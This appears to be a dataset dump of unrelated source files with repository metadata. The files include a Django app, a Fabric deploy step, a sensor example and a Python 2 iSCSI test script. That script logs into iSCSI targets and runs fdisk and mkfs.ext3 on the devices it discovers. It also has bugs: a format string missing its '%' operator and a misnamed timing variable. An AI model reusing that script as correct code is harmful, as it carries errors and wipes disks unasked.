    sudo('a2ensite {}.conf'.format(PROJECT_NAME))
def _grant_apache2():
    # Give the www-data group ownership so Apache can read/write project files.
    sudo('sudo chown -R :www-data ~/{}'.format(PROJECT_NAME))
def _grant_sqlite3():
    # The SQLite database file must be group-writable for Apache/mod_wsgi.
    sudo('sudo chmod 775 ~/{}/db.sqlite3'.format(PROJECT_NAME))
def _restart_apache2():
    # Reload the new code and vhost configuration.
    sudo('sudo service apache2 restart')
|
[
"[email protected]"
] | |
5edb0c8e55ee71407031f5baea3676bd34bf5368
|
28ae42f6a83fd7c56b2bf51e59250a31e68917ca
|
/tracpro/polls/migrations/0015_issue_region.py
|
ff1c2937af89c2c8ce646673002fd58356fd1f04
|
[
"BSD-3-Clause"
] |
permissive
|
rapidpro/tracpro
|
0c68443d208cb60cbb3b2077977786f7e81ce742
|
a68a782a7ff9bb0ccee85368132d8847c280fea3
|
refs/heads/develop
| 2021-01-19T10:29:48.381533 | 2018-03-13T12:17:11 | 2018-03-13T12:17:11 | 29,589,268 | 5 | 10 |
BSD-3-Clause
| 2018-02-23T14:43:12 | 2015-01-21T12:51:24 |
Python
|
UTF-8
|
Python
| false | false | 575 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add a nullable ``region`` FK (groups.Region) to polls.Issue."""

    dependencies = [
        ('groups', '0004_auto_20150123_0909'),
        ('polls', '0014_remove_response_is_complete'),
    ]

    operations = [
        migrations.AddField(
            model_name='issue',
            name='region',
            field=models.ForeignKey(related_name='issues_2', to='groups.Region', help_text='Region where poll was conducted', null=True),
            preserve_default=True,
        ),
    ]
|
[
"[email protected]"
] | |
6b10d9a5295db113b96722c8b92c968c83079333
|
ef821468b081ef2a0b81bf08596a2c81e1c1ef1a
|
/Python OOP/Decorators-Exercise/Cache.py
|
3630fbd6868ddb28d50316c5fea622d51b440ae5
|
[] |
no_license
|
Ivaylo-Atanasov93/The-Learning-Process
|
71db22cd79f6d961b9852f140f4285ef7820dd80
|
354844e2c686335345f6a54b3af86b78541ed3f3
|
refs/heads/master
| 2023-03-30T20:59:34.304207 | 2021-03-29T15:23:05 | 2021-03-29T15:23:05 | 294,181,544 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 346 |
py
|
def cache(func):
    """Memoizing decorator for single-argument functions.

    Results are stored in the ``log`` dict exposed on the wrapper, keyed by
    the argument. Fix: the original version recomputed ``func(n)`` on every
    call and only *recorded* the result -- the cache was never read. Cached
    values are now reused, which is what makes the fibonacci example below
    run in linear rather than exponential time.
    """
    from functools import wraps

    @wraps(func)
    def wrapper(n):
        if n not in wrapper.log:
            wrapper.log[n] = func(n)
        return wrapper.log[n]
    wrapper.log = {}
    return wrapper
@cache
def fibonacci(n):
    """Return the n-th Fibonacci number (fib(0) == 0, fib(1) == 1)."""
    return n if n < 2 else fibonacci(n - 1) + fibonacci(n - 2)
fibonacci(3)
print(fibonacci.log)  # results recorded for n <= 3
fibonacci(4)
print(fibonacci.log)  # now also contains n == 4
|
[
"[email protected]"
] | |
b8fac3e471ae450389961aa1cb49b4834ce1d6cb
|
5b565e331073a8b29f997c30b58d383806f7d5a8
|
/pizzeria/11_env/bin/easy_install-3.7
|
242566d7d779997c369a8ea2a01c7db939a5250b
|
[] |
no_license
|
jeongwook/python_work
|
f403d5be9da6744e49dd7aedeb666a64047b248d
|
bba188f47e464060d5c3cd1f245d367da37827ec
|
refs/heads/master
| 2022-04-02T23:16:57.597664 | 2020-01-21T08:29:48 | 2020-01-21T08:29:48 | 227,506,961 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 288 |
7
|
#!/Users/jeongwook/Desktop/python/python_work/pizzeria/11_env/bin/python3
# -*- coding: utf-8 -*-
# Auto-generated setuptools console-script shim -- regenerated on install;
# do not edit by hand.
import re
import sys

from setuptools.command.easy_install import main

if __name__ == '__main__':
    # Strip "-script.pyw"/".exe" suffixes from argv[0] (Windows launcher
    # convention) so setuptools sees the canonical command name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
|
[
"[email protected]"
] | |
7d75a5e69d0aeff702d6fe53686e32f47cd01b4e
|
f1614f3531701a29a33d90c31ab9dd6211c60c6b
|
/test/menu_sun_integration/handlers/test_status_synchronizer_service.py
|
207c451856241312424ce76fdbb72a3f98062b7d
|
[] |
no_license
|
pfpacheco/menu-sun-api
|
8a1e11543b65db91d606b2f3098847e3cc5f2092
|
9bf2885f219b8f75d39e26fd61bebcaddcd2528b
|
refs/heads/master
| 2022-12-29T13:59:11.644409 | 2020-10-16T03:41:54 | 2020-10-16T03:41:54 | 304,511,679 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,110 |
py
|
import json
import os
import responses
import pytest
from menu_sun_api.domain.model.customer.customer import Customer
from menu_sun_api.domain.model.order.order import OrderStatusType
from menu_sun_api.domain.model.order.order_repository import OrderRepository
from menu_sun_api.domain.model.seller.seller import IntegrationType
from menu_sun_integration.application.services.order_integration_service import OrderIntegrationService
from promax.application.status_synchronizer_service import StatusSynchronizerService
from test.menu_sun_api.db.order_factory import OrderFactory, OrderStatusFactory
from test.menu_sun_api.db.seller_factory import SellerFactory
from test.menu_sun_api.integration_test import IntegrationTest
here = os.path.dirname(os.path.realpath(__file__))
def bind_seller(integration_type):
    # Create a seller fixture with a fixed seller_code, varying only the
    # integration backend under test.
    return SellerFactory.create(seller_code='0810204', integration_type=integration_type)
class TestStatusNotifierService(IntegrationTest):
    """Integration test: syncing order statuses from the Promax backend."""
    @pytest.fixture
    def active_responses(self):
        # Stub the Promax LDAP authentication endpoint with a canned JSON
        # response so the service under test can "log in" without a network.
        json_file = open(
            os.path.join(
                here,
                '../../menu_sun_integration/infrastructure/ambev/promax_response/authenticate_user_response.json'))
        response = json.load(json_file)
        responses.add(responses.POST, 'https://{}/ambev/security/ldap/authenticateUser'.format(os.getenv("PROMAX_IP")),
                      json=response, status=200)
        return responses
    @responses.activate
    def test_fetch_order_status_promax(self, session, active_responses):
        # Arrange: a Promax seller with one order whose latest status is APPROVED.
        seller = bind_seller(IntegrationType.PROMAX)
        session.commit()
        customer = Customer(document="17252508000180", seller_id=seller.id)
        statuses = [OrderStatusFactory(status=OrderStatusType.NEW),
                    OrderStatusFactory(status=OrderStatusType.APPROVED)]
        order = OrderFactory.create(seller_id=seller.id, order_id='M2100008658',
                                    customer=customer, statuses=statuses)
        session.commit()
        # Stub the Promax order-history endpoint; the canned payload reports
        # this order as cancelled (see assertion below).
        json_file = open(
            os.path.join(
                here,
                '../../menu_sun_integration/infrastructure/ambev/promax_response/orders_history_response.json'))
        response = json.load(json_file)
        active_responses.add(responses.POST,
                             'https://{}/ambev/genericRestEndpoint'.format(os.getenv("PROMAX_IP")),
                             json=response, status=200)
        # Act: synchronize every pending order for this seller.
        order_repository = OrderRepository(session=session)
        integration_service = OrderIntegrationService(session=session)
        status_notification = StatusSynchronizerService(order_repository=order_repository,
                                                        integration_service=integration_service)
        status_notification.sync_all_pending_orders(
            seller_id=seller.id, seller_code=seller.seller_code, integration_type=seller.integration_type)
        session.commit()
        # Assert: the backend's CANCELED state was persisted locally.
        order = order_repository.get_order(
            seller_id=seller.id, order_id=order.order_id)
        assert (order.status.status == OrderStatusType.CANCELED)
|
[
"[email protected]"
] | |
faf55dcced2172399d37e25d66e39d89868333d0
|
280049c5d363df840e5a2184002e59625f0af61b
|
/datastructure11-balancedparanthesischeck.py
|
26c752c9dfffff64c23a2cf8d5095ae37812d617
|
[] |
no_license
|
deesaw/DataSPython
|
853c1b36f7185752613d6038e706b06fbf25c84e
|
c69a23dff3b3852310f145d1051f2ad1dda6b7b5
|
refs/heads/main
| 2023-02-19T13:36:01.547293 | 2021-01-16T13:15:56 | 2021-01-16T13:15:56 | 330,166,053 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,346 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 6 12:17:58 2021
@author: deesaw
"""
def balance_check(s):
    """Return True when every bracket in *s* is properly matched and nested."""
    # An odd number of characters can never pair up completely.
    if len(s) % 2 != 0:
        return False
    # Map each closing bracket onto the opener it must pair with.
    closer_to_opener = {')': '(', ']': '[', '}': '{'}
    openers = set(closer_to_opener.values())
    pending = []
    for ch in s:
        if ch in openers:
            # Openers wait on the stack until their closer arrives.
            pending.append(ch)
        elif not pending or pending.pop() != closer_to_opener.get(ch):
            # Either a closer with nothing open, or a mismatched pair.
            return False
    # Balanced only if no opener is still waiting for its closer.
    return not pending
from nose.tools import assert_equal
class TestBalanceCheck(object):
    """Nose-based harness exercising a bracket-balancing solution."""
    def test(self,sol):
        # *sol* is the candidate function; each case pairs input with expected result.
        assert_equal(sol('[](){([[[]]])}('),False)
        assert_equal(sol('[{{{(())}}}]((()))'),True)
        assert_equal(sol('[[[]])]'),False)
        print('ALL TEST CASES PASSED')
# Run Tests
t = TestBalanceCheck()
t.test(balance_check)
|
[
"[email protected]"
] | |
adec15e7f10d62c6d1a6c1bca83ce174883b2551
|
69f47a6e77fc2a1363fc8713ed83d36209e7cf32
|
/deframed/default.py
|
997b289bd34920ff3704dc3d241fa7fbc6f6c50e
|
[] |
no_license
|
smurfix/deframed
|
f1c4611c597809b53a138b70665430ed080a989d
|
9c1d4db2991cef55725ac6ecae44af60a96ff4f2
|
refs/heads/master
| 2022-07-20T14:08:35.938667 | 2022-07-14T07:05:43 | 2022-07-14T07:05:43 | 259,882,446 | 24 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,184 |
py
|
"""
This module contains the default values for configuring DeFramed.
"""
from .util import attrdict
__all__ = ["CFG"]
# Default configuration tree; callers typically deep-merge their own
# settings over these values.
CFG = attrdict(
    # ``logging`` is a stdlib logging.config.dictConfig-style schema.
    logging=attrdict( # a magic incantation
        version=1,
        loggers=attrdict(
            #"asyncari": {"level":"INFO"},
        ),
        root=attrdict(
            handlers= ["stderr",],
            level="INFO",
        ),
        handlers=attrdict(
            # File handler is defined but not attached to root by default.
            logfile={
                "class":"logging.FileHandler",
                "filename":"/var/log/deframed.log",
                "level":"INFO",
                "formatter":"std",
            },
            stderr={
                "class":"logging.StreamHandler",
                "level":"INFO",
                "formatter":"std",
                "stream":"ext://sys.stderr",
            },
        ),
        formatters=attrdict(
            std={
                "class":"deframed.util.TimeOnlyFormatter",
                "format":'%(asctime)s %(levelname)s:%(name)s:%(message)s',
            },
        ),
        disable_existing_loggers=False,
    ),
    server=attrdict( # used to setup the hypercorn toy server
        host="127.0.0.1",
        port=8080,
        prio=0,
        name="test me",
        use_reloader=False,
        ca_certs=None,
        certfile=None,
        keyfile=None,
    ),
    # Mustache template rendered as the single-page app shell.
    mainpage="templates/layout.mustache",
    debug=False,
    data=attrdict( # passed to main template
        title="Test page. Do not test!",
        # ``loc`` holds URLs (or local paths) for front-end assets.
        loc=attrdict(
            #msgpack="https://github.com/ygoe/msgpack.js/raw/master/msgpack.min.js",
            #mustache="https://github.com/janl/mustache.js/raw/master/mustache.min.js",
            msgpack="https://unpkg.com/@msgpack/msgpack",
            mustache="/static/ext/mustache.min.js",
            bootstrap_css="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css",
            bootstrap_js="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js",
            poppler="https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js",
            jquery="https://code.jquery.com/jquery-3.4.1.slim.min.js",
        ),
        static="static", # path
    ),
)
|
[
"[email protected]"
] | |
f794cd1dae5cb4ed8da0fc22286c5a047b86c2fa
|
d8a541a2953c9729311059585bb0fca9003bd6ef
|
/Lists as stack ques/cups_and_bottles.py
|
efc8af013cd606d663a6539b7b98d2807e6c28fc
|
[] |
no_license
|
grigor-stoyanov/PythonAdvanced
|
ef7d628d2b81ff683ed8dd47ee307c41b2276dd4
|
0a6bccc7faf1acaa01979d1e23cfee8ec29745b2
|
refs/heads/main
| 2023-06-10T09:58:04.790197 | 2021-07-03T02:52:20 | 2021-07-03T02:52:20 | 332,509,767 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 604 |
py
|
# Fill cups (served FIFO) from bottles (taken LIFO) and track overflow.
from collections import deque

cups = deque(int(token) for token in input().split())
bottles = [int(token) for token in input().split()]
wasted_water = 0

# Keep pouring while there is both a cup to fill and a bottle to pour from.
while cups and bottles:
    capacity = cups.popleft()
    while capacity > 0 and bottles:
        capacity -= bottles.pop()
        if capacity < 0:
            # The last bottle overfilled this cup; the excess is wasted.
            wasted_water -= capacity

if cups:
    print('Cups: ', end='')
    print(*cups)
else:
    print('Bottles: ', end='')
    # Bottles are consumed from the end, so report them in reverse order.
    print(*reversed(bottles))
print(f'Wasted litters of water: {wasted_water}')
|
[
"[email protected]"
] | |
1c6ff28e26ea56bf58d2d64410f7f7ccc128b1c3
|
a51854991671a4389902945578288da34845f8d9
|
/libs/Utility/__init__.py
|
413df21a5385589d95b5c2ec9bf735a694a5e504
|
[] |
no_license
|
wuyou1102/DFM_B2
|
9210b4b8d47977c50d92ea77791f477fa77e5f83
|
69ace461b9b1b18a2269568110cb324c04ad4266
|
refs/heads/master
| 2020-04-13T18:54:20.045734 | 2019-06-17T12:46:23 | 2019-06-17T12:46:23 | 163,387,873 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 297 |
py
|
# -*- encoding:UTF-8 -*-
from libs.Utility import Logger
import Alert as Alert
import Random as Random
from ThreadManager import append_thread
from ThreadManager import is_alive
from ThreadManager import query_thread
from Common import *
import ParseConfig as ParseConfig
from Serial import Serial
|
[
"[email protected]"
] | |
580dbd15bf43272f28e3f9bd42413a905510cd76
|
bef304291f5fe599f7a5b713d19544dc0cecd914
|
/todoapp/todo_list/forms.py
|
9fe1a617dd0f429fc6c8b3c1fa6885fee975c262
|
[] |
no_license
|
coderj001/django-todo-and-air-quality
|
9ca847143ea86677a0d54026c060638fabf8c042
|
012ee15fa3cfbf1aa08ae4513c3bf4fa828b3ba3
|
refs/heads/master
| 2020-12-14T20:20:49.845722 | 2020-01-19T15:06:42 | 2020-01-19T15:06:42 | 234,855,834 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 147 |
py
|
from django import forms
from .models import ToDoList
class ListForm(forms.ModelForm):
    """ModelForm for creating/updating a ToDoList entry (item + completed flag)."""
    class Meta:
        model=ToDoList
        fields=['item','completed']
|
[
"[email protected]"
] | |
d1877db7913e58c396ec934ebb1dc1c993bcbbb5
|
892dd32ee0be7135cd33c875b06dcc66307dcc99
|
/automation/MPTS/verifyIqn.py
|
b82a09a932deb898ea00bc911d3867e80a4c52da
|
[] |
no_license
|
cloudbytestorage/devops
|
6d21ed0afd752bdde8cefa448d4433b435493ffa
|
b18193b08ba3d6538277ba48253c29d6a96b0b4a
|
refs/heads/master
| 2020-05-29T08:48:34.489204 | 2018-01-03T09:28:53 | 2018-01-03T09:28:53 | 68,889,307 | 4 | 8 | null | 2017-11-30T08:11:39 | 2016-09-22T05:53:44 |
Python
|
UTF-8
|
Python
| false | false | 5,429 |
py
|
import json
import sys
import time
from time import ctime
from cbrequest import configFile, executeCmd, executeCmdNegative, resultCollection, getoutput
config = configFile(sys.argv);
stdurl = 'https://%s/client/api?apikey=%s&response=%s&' %(config['host'], config['apikey'], config['response'])
negativeFlag = 0
if len(sys.argv)== 3:
if sys.argv[2].lower()== "negative":
negativeFlag = 1;
else:
print "Argument is not correct.. Correct way as below"
print " python verifyIqn.py config.txt"
print " python verifyIqn.py config.txt negative"
exit()
for x in range(1, int(config['Number_of_ISCSIVolumes'])+1):
startTime = ctime()
executeCmd('mkdir -p mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
### Discovery
iqnname = getoutput('iscsiadm -m discovery -t st -p %s:3260 | grep %s | awk {\'print $2\'}' %(config['voliSCSIIPAddress%d' %(x)],config['voliSCSIMountpoint%d' %(x)]))
# for negative testcase
if negativeFlag == 1:
###no iscsi volumes discovered
if iqnname==[]:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip, test case failed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
# for positive testcase
else:
###no iscsi volumes discovered
if iqnname==[]:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
#### if login successfull mount and copy some data
device = getoutput('iscsiadm -m session -P3 | grep \'Attached scsi disk\' | awk {\'print $4\'}')
device2 = (device[0].split('\n'))[0]
executeCmd('fdisk /dev/%s < fdisk_response_file' (device2))
executeCmd('mkfs.ext3 /dev/%s1' %(device2))
executeCmd('mount /dev/%s1 mount/%s' %(device2, config['voliSCSIMountpoint%d' %(x)]))
executeCmd('cp testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
output=executeCmd('diff testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
if output[0] == "PASSED":
endtime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
else:
endtime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### logout
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --logout | grep Logout' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
|
[
"[email protected]"
] | |
3fccf4fa9600a4a3e7b07d4b28660e603bcef30e
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/triangle/0296cbe043e446b8b9365e20fb75c136.py
|
18e84ab880631f7510539ae77e9524b0eda2b632
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null |
UTF-8
|
Python
| false | false | 621 |
py
|
# represents a triangle
class Triangle(object):
    """A triangle classified by how many of its side lengths are distinct."""

    # Index 0 -> one distinct length, 1 -> two, 2 -> three.
    _kinds=["equilateral","isosceles","scalene"]

    def __init__(self, a, b, c):
        sides = [a, b, c]
        if min(sides) <= 0:
            raise TriangleError("Triangles cannot have zero or negative side length.")
        # The inequality can only fail for the longest side: it fails exactly
        # when twice the longest side reaches the full perimeter.
        if 2 * max(sides) >= sum(sides):
            raise TriangleError("Triangles must satisfy the triangle inequality.")
        self.sides = sorted(sides)

    def kind(self):
        """Return 'equilateral', 'isosceles' or 'scalene'."""
        distinct = len(set(self.sides))
        return Triangle._kinds[distinct - 1]
# some sort of error was encountered when constructing a Triangle
class TriangleError(Exception):
    """Raised when the given side lengths cannot form a valid triangle."""
    def __init__(self,message):
        super(TriangleError,self).__init__(message)
|
[
"[email protected]"
] | |
748f97751e80a2258b78d59ce4a378db9a54d1b5
|
b743a6b89e3e7628963fd06d2928b8d1cdc3243c
|
/bpl_client/Client.py
|
c9143098c648f30df369d458d22b99d0e6d61a3a
|
[
"MIT"
] |
permissive
|
DuneRoot/bpl-cli
|
847248d36449181856e6cf34a18119cd9fc1b045
|
3272de85dd5e4b12ac5b2ad98bf1e971f3bf5c28
|
refs/heads/master
| 2020-03-25T17:42:06.339501 | 2019-02-20T19:20:26 | 2019-02-20T19:20:26 | 143,990,801 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,781 |
py
|
"""
BPL Client
Usage:
bpl-cli network config new
bpl-cli network config use
bpl-cli network config show
bpl-cli network peers
bpl-cli network status
bpl-cli account create
bpl-cli account status <address>
bpl-cli account transactions <address>
bpl-cli account send <amount> <recipient>
bpl-cli account vote <username>
bpl-cli account delegate <username>
bpl-cli message sign <message>
bpl-cli message verify <message> <publicKey>
Options:
-h --help Show this screen.
--version Show version.
Help:
For help using this client, please see https://github.com/DuneRoot/bpl-cli
"""
from importlib import import_module
from functools import reduce
from docopt import docopt
import json
from bpl_client.helpers.Constants import COMMANDS_JSON
from bpl_client.helpers.Util import read_file
from bpl_client import __version__
class Client:
    """CLI entry point: parse argv via docopt and dispatch to a command class."""
    def __init__(self):
        """
        Client Class.
        Retrieves options from docopt. Options are then filtered using data stored in commands.json.
        Command is then imported and instantiated.
        """
        self._options = docopt(__doc__, version=__version__)
        # Keep only options carrying values (e.g. <address>); drop boolean flags.
        self._arguments = {
            k: v for k, v in self._options.items()
            if not isinstance(v, bool)
        }
        commands_json = json.loads(read_file(COMMANDS_JSON))
        # First manifest entry whose condition flags are all set on the CLI.
        command = list(filter(lambda x: self._is_command(x["Conditions"]), commands_json))[0]
        # Lazily import the command's module, instantiate its class with the
        # value arguments, and run it immediately.
        getattr(
            import_module("bpl_client.commands.{0}".format(command["Module Identifier"])),
            command["Class Identifier"]
        )(self._arguments).run()
    def _is_command(self, conditions):
        # True when every named docopt option in *conditions* is truthy.
        return reduce(lambda x, y: x and y, map(lambda y: self._options[y], conditions))
|
[
"[email protected]"
] | |
aa43f40b58364ba1f55d60b52c75f3e4b4bbfeb9
|
7136e5242793b620fa12e9bd15bf4d8aeb0bfe7a
|
/examples/adspygoogle/dfp/v201101/get_licas_by_statement.py
|
9086f2f5d7006a77c1a7b578138725bf4db3479b
|
[
"Apache-2.0"
] |
permissive
|
hockeyprincess/google-api-dfp-python
|
534519695ffd26341204eedda7a8b50648f12ea9
|
efa82a8d85cbdc90f030db9d168790c55bd8b12a
|
refs/heads/master
| 2021-01-10T10:01:09.445419 | 2011-04-14T18:25:38 | 2011-04-14T18:25:38 | 52,676,942 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,266 |
py
|
#!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets all line item creative associations (LICA) for a given
line item id. The statement retrieves up to the maximum page size limit of 500.
To create LICAs, run create_licas.py."""
__author__ = '[email protected] (Stan Grinberg)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.append(os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle.dfp.DfpClient import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service. By default, the request is always made against
# the sandbox environment.
lica_service = client.GetLineItemCreativeAssociationService(
    'https://sandbox.google.com', 'v201101')
# Set the id of the line item to get LICAs by.
line_item_id = 'INSERT_LINE_ITEM_ID_HERE'
# Create statement object to only select LICAs for the given line item id.
# The ':lineItemId' placeholder is bound via the typed values list below.
values = [{
    'key': 'lineItemId',
    'value': {
        'xsi_type': 'NumberValue',
        'value': line_item_id
    }
}]
filter_statement = {'query': 'WHERE lineItemId = :lineItemId LIMIT 500',
                    'values': values}
# Get LICAs by statement.
licas = lica_service.GetLineItemCreativeAssociationsByStatement(
    filter_statement)[0]['results']
# Display results.
for lica in licas:
  print ('LICA with line item id \'%s\', creative id \'%s\', and status '
         '\'%s\' was found.' % (lica['id'], lica['creativeId'], lica['status']))
print
print 'Number of results found: %s' % len(licas)
|
[
"api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138"
] |
api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138
|
405974db9681a1efc9bb65d55fa0ae64ee33d230
|
94470cf07f402b1c7824e92a852cd3203f94ac4a
|
/polls/apiviews.py
|
6f6ca88b9da4638cbf0f4888e4305f24fa9ffee5
|
[] |
no_license
|
jbeltranleon/pollsapi_django_rest
|
c509bf0b0c1e2db870ed8a4aaa1647bf74c5f8cd
|
0855820541064ffd77dbd1c6e77f695d4f18e517
|
refs/heads/master
| 2020-04-14T17:55:02.364183 | 2019-01-04T16:01:46 | 2019-01-04T16:01:46 | 163,999,126 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,203 |
py
|
from rest_framework import generics
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
from .models import Poll, Choice
from .serializers import PollSerializer, ChoiceSerializer,\
VoteSerializer
class PollList(generics.ListCreateAPIView):
    """List all polls (GET) or create a new poll (POST)."""
    queryset = Poll.objects.all()
    serializer_class = PollSerializer
class PollDetail(generics.RetrieveDestroyAPIView):
    """Retrieve (GET) or delete (DELETE) a single poll by primary key."""
    queryset = Poll.objects.all()
    serializer_class = PollSerializer
class ChoiceList(generics.ListCreateAPIView):
    """List or create choices, scoped to the poll given by the URL's ``pk``."""
    def get_queryset(self):
        # Only return choices belonging to the poll identified in the URL.
        queryset = Choice.objects.filter(poll_id=self.kwargs["pk"])
        return queryset
    serializer_class = ChoiceSerializer
class CreateVote(APIView):
    """Record a vote for a specific choice within a poll."""
    def post(self, request, pk, choice_pk):
        # Build the vote payload from the URL kwargs plus the request body.
        voted_by = request.data.get("voted_by")
        data = {'choice': choice_pk, 'poll': pk, 'voted_by': voted_by}
        serializer = VoteSerializer(data=data)
        if serializer.is_valid():
            vote = serializer.save()
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        else:
            # Validation failed (e.g. missing voter or unknown choice/poll).
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
|
[
"[email protected]"
] | |
cdf669514aaf2c1d7c33248746135d7b0232f29f
|
184ab7b1f5d6c4a4382cf4ffcf50bbad0f157ef1
|
/library/aht10/aht10_example.py
|
46df77a8a71666025fda1409a3c5b7ebdbed9497
|
[] |
no_license
|
RT-Thread/mpy-snippets
|
fdd257bb9f44cdc92e52cd39cdc88a57d736fb26
|
9296d559da275f51845cb9c2f8e2010f66f72cc1
|
refs/heads/master
| 2023-06-14T02:20:05.449559 | 2020-06-03T02:34:47 | 2020-06-03T02:35:19 | 198,854,793 | 28 | 18 | null | 2020-05-06T11:32:46 | 2019-07-25T15:14:56 |
Python
|
UTF-8
|
Python
| false | false | 517 |
py
|
# Example: read temperature/humidity from an AHT10 sensor over software I2C.
from machine import I2C, Pin
from aht10 import AHT10
PIN_CLK = 54        # PD6, get the pin number from get_pin_number.py
PIN_SDA = 33        # PC1
clk = Pin(("clk", PIN_CLK), Pin.OUT_OD)  # Select the PIN_CLK as the clock
sda = Pin(("sda", PIN_SDA), Pin.OUT_OD)  # Select the PIN_SDA as the data line
# -1 selects a software (bit-banged) I2C bus at 100 kHz.
i2c = I2C(-1, clk, sda, freq=100000)
sensor = AHT10(i2c)
sensor.sensor_init()
sensor.is_calibration_enabled()
print("current temp: %.2f "%sensor.read_temperature())
print("current humi: %.2f %%"%sensor.read_humidity())
|
[
"[email protected]"
] | |
e2e44ffd1b8897513aaba446dd704ac14b2c5945
|
35dbd536a17d7127a1dd1c70a2903ea0a94a84c2
|
/src/sentry_plugins/sessionstack/client.py
|
2c50f1bafe960bbe0331c77cff05e234168642de
|
[
"Apache-2.0",
"BUSL-1.1"
] |
permissive
|
nagyist/sentry
|
efb3ef642bd0431990ca08c8296217dabf86a3bf
|
d9dd4f382f96b5c4576b64cbf015db651556c18b
|
refs/heads/master
| 2023-09-04T02:55:37.223029 | 2023-01-09T15:09:44 | 2023-01-09T15:09:44 | 48,165,782 | 0 | 0 |
BSD-3-Clause
